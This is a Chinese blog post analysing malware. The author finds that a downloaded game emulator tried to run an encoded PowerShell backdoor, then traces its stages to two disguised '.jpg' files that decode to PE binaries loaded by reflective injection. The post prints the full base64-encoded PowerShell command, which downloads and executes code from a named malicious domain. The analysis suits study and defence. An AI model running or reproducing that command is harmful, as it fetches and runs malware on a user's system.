记一次对恶意软件的简单分析

前言

昨天下载了一个模拟器,正在打算回味马里奥的时候,火绒突然弹了一个报警,提示有程序想要运行powershell脚本,我一看,好家伙,应该是后门,简单的分析一波。

20220117095849-03758d6a-7739-1

分析

步骤一

首先把执行的代码复制出来

powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBpAHAALgBpAGMAdQBkAG8AbQBhAGkAbgAuAGkAYwB1ACcAKQApAA==

接着把后面的字符串进行base64解码,先将base64转为hex,再将hex里面无意义的00去除之后转字符串:

20220117100415-c58369d6-7739-1
20220117100527-f0d42544-7739-1

这里获取到一个域名:hxxp://ip.icudomain.icu,
先看一下这个域名的解析记录:

20220117100903-7141e73e-773a-1


解析到的IP为cloudflare CDN的节点,故这里不进行端口扫描等对服务器的测试,继续分析他到底干了啥。
接着我们来看一下这个URL里面是啥

步骤二

20220117101407-264af9b8-773b-1

对PEBytes进行进一步处理:

20220117101606-6d5aa812-773b-1

去除换行之后的内容:

20220117102312-6b82cda2-773c-1

步骤三

对里面的编码部分进行解码处理

20220117102556-cd681414-773c-1

可以发现又下载了两个文件,这个地方要注意一下,如果不使用{可}{学}{上}{网},会被拦截

20220117103209-abaf46b6-773d-1
20220117103257-c8181f62-773d-1

powershell.jpg部分内容截图

20220117103622-4283f708-773e-1


对powershell.jpg进行解码,可以发现是一个pe文件

20220117104301-3046c4fc-773f-1

base64.jpg部分内容截图

20220117103932-b3b0cc12-773e-1

对文件内容进行解码,也是一个pe文件

20220117104451-71e8efc0-773f-1

由于本人对PE文件不太熟悉,通过百度得知,Invoke-ReflectivePEInjection是一个可以加载pe文件的工具,github项目如下:https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
另外一个PE文件应该就是后门,分析到此结束。由于本人技术比较菜,感谢大家的阅读。

本文转载自https://xz.aliyun.com/t/10814,只做本站测试使用,本文观点不代表安强科技社区立场。

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年3月15日 下午4:32
下一篇 2022年3月15日 下午4:54

相关推荐

发表回复

您的电子邮箱地址不会被公开。